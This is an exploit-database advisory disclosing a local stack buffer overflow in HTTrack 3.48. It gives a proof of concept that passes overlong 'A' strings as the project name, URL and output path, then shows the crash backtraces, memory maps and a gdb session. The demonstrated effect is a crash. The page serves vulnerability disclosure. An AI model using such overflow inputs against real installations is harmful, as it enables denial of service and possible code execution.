HTTrack Local Stack Buffer Overflow

2017-05-07 / 2017-05-08
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

################ #Exploit Title: HTTrack Local Stack Buffer Overflow #CWE: CWE-119 #Exploit Author: Hosein Askari #Vendor HomePage: http://www.httrack.com #Version : 3.48-22-1(Fedora 25), 3.48-24(Debian) #Exploit Tested on: Parrot OS #Date: 07-05-2017 #Category: Application #Author Mail : hosein.askari@aol.com #Description: Buffer overflow in URI and Project Name processing in HTTrack and WebHTTrack on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long String. ############################### ---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v Ready to launch the mirror? (Y/n) :y WARNING! You are running this program as root! It might be a good idea to run as a different user *** buffer overflow detected ***: httrack terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] httrack(+0x152e)[0x8000152e] ======= Memory map: ======== 80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack 80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack 80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack 80007000-80050000 rw-p 00000000 00:00 0 [heap] b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f5000-b7a3d000 rw-p 00000000 00:00 0 b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d13000-b7d16000 rw-p 00000000 00:00 0 b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecd000-b7ed0000 rw-p 00000000 00:00 0 b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb4000-b7fb6000 rw-p 00000000 00:00 0 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7ffd000-b7ffe000 rw-p 00000000 00:00 0 b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] Caught signal 6 httrack(+0x1de3)[0x80001de3] [0xb7fd9d04] [0xb7fd9cf9] /lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050] /lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577] /lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] httrack(+0x152e)[0x8000152e] Please report the problem at http://forum.httrack.com Aborted (core dumped) -------------------- (gdb) run Starting program: /usr/bin/httrack [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". Welcome to HTTrack Website Copier (Offline Browser) 3.48-24 Copyright (C) 1998-2016 Xavier Roche and other contributors To see the option list, enter a blank line or try httrack --help Enter project name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Base path (return=/home/constantine/websites/) : Enter URLs (separated by commas or blank spaces) :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Action: (enter) 1 Mirror Web Site(s) 2 Mirror Web Site(s) with Wizard 3 Just Get Files Indicated 4 Mirror ALL links in URLs (Multiple Mirror) 5 Test Links In URLs (Bookmark Test) 0 Quit : : 1 Proxy (return=none) : You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip Wildcards (return=none) : You can define additional options, such as recurse level (-r<number>), separated by blank spaces To see the option list, type help Additional options (return=none) : ---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v Ready to launch the mirror? (Y/n) :y WARNING! You are running this program as root! It might be a good idea to run as a different user *** buffer overflow detected ***: /usr/bin/httrack terminated ======= Backtrace: ========= /lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/bin/httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] /usr/bin/httrack(+0x152e)[0x8000152e] ======= Memory map: ======== 80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack 80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack 80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack 80007000-80050000 rw-p 00000000 00:00 0 [heap] b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f5000-b7a3d000 rw-p 00000000 00:00 0 b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d13000-b7d16000 rw-p 00000000 00:00 0 b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecd000-b7ed0000 rw-p 00000000 00:00 0 b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb4000-b7fb6000 rw-p 00000000 00:00 0 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7ffd000-b7ffe000 rw-p 00000000 00:00 0 b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] Program received signal SIGABRT, Aborted. 0xb7fd9cf9 in __kernel_vsyscall () (gdb) continue Continuing. Caught signal 6 /usr/bin/httrack(+0x1de3)[0x80001de3] [0xb7fd9d04] [0xb7fd9cf9] /lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050] /lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577] /lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/bin/httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] /usr/bin/httrack(+0x152e)[0x8000152e] Please report the problem at http://forum.httrack.com Program received signal SIGABRT, Aborted. 0xb7fd9cf9 in __kernel_vsyscall ()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top